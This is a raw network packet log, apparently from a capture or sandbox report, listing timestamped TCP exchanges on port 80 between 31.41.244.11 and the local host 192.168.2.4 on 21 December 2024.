                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.127163887 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.127216101 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.128029108 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.128074884 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.128153086 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.128201962 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.129024029 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.129076004 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.129187107 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.129235029 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.130022049 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.130072117 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.130198002 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.130249023 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.131015062 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.131072044 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.131149054 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.131197929 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.132072926 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.132133961 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.132239103 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.132292986 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.133030891 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.133080959 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.133215904 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.133268118 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.134022951 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.134074926 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.134151936 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.134202957 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.135004997 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.135059118 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.135165930 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.135215998 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.136053085 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.136105061 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.136202097 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.136251926 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.137049913 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.137099981 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.137190104 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.137239933 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.138015032 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.138067007 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.138144970 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.138190985 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.139014959 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.139072895 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.139151096 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.139203072 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.140057087 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.140109062 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.140209913 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.140263081 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.141055107 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.141122103 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.141231060 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.141288996 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.142074108 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.142132044 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.142236948 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.142292023 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.143021107 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.143078089 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.143166065 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.143217087 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.143986940 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.144037008 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.283859968 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.283993959 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.283998013 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.284049034 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.284239054 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.284291983 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.284377098 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.284424067 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.284976959 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.285022974 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.285101891 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.285151005 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.286003113 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.286055088 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.286132097 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.286180019 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.286962032 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.287014008 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.287125111 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.287175894 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.288038969 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.288089991 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.288271904 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.288321018 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.288968086 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.289016962 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.289200068 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.289252996 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.290019035 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.290064096 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.290186882 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.290236950 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.290987968 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.291033983 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.291105032 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.291152954 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.291960001 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.292010069 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.292108059 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.292155981 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.292952061 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.293009996 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.293140888 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.293189049 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.293946981 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.294045925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.294234037 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.294282913 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.295166969 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.295214891 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.295291901 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.295342922 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.296020031 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.296068907 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.296147108 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.296195030 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.296957016 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.297007084 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.297115088 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.297162056 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.297991037 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.298039913 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.298118114 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.298165083 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.298959970 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.299010038 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.299130917 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.299182892 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.299982071 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.300033092 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.300163031 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.300215960 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.300965071 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.301012039 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.301105022 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.301153898 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.301995039 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.302045107 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.302119970 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.302167892 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.303064108 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.303113937 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.303177118 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.303226948 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.303961039 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.304028988 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.304152012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.304203987 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.304977894 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.305025101 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.305124044 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.305172920 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.305979013 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.306026936 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.306133986 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.306183100 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.306989908 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.307039022 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.307116985 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.307168961 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.307996035 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.308048010 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.308129072 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.308182955 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.308986902 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.309036016 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.309144974 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.309194088 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.310069084 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.310122013 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.310172081 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.310221910 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.310978889 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.311028004 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.311145067 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.311191082 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.311968088 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.312014103 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.312113047 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.312156916 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.312979937 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.313045979 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.313122988 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.313173056 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.313961983 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.314062119 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.314137936 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.314184904 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.314968109 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.315025091 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.315186977 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.315233946 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.316025972 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.316076994 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.316188097 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.316236019 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.317030907 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.317078114 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.317131996 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.317178965 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.317980051 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.318028927 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.318125010 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.318175077 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.319056034 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.319116116 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.319231033 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.319278955 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.319971085 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.320020914 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.320193052 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.320244074 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.320981026 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.321029902 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.321106911 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.321154118 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.321991920 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.322041035 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.322179079 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.322221994 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.322978973 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.323028088 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.323113918 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.323162079 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.323977947 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.324071884 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.324146986 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.324193954 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.324975014 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.325026035 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.325104952 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.325153112 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.325978041 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.326025963 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.326189041 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.326237917 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.326996088 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.327044964 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.327148914 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.327203989 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.328002930 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.328052998 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.328164101 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.328207016 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.328969955 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.329029083 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.329149008 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.329196930 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.330110073 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.330173969 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.330203056 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.330252886 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.330991983 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.331042051 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.331136942 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.331187010 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.332020044 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.332086086 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.332165956 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.332209110 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.332987070 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.333035946 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.333151102 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.333199024 CET4977080192.168.2.431.41.244.11
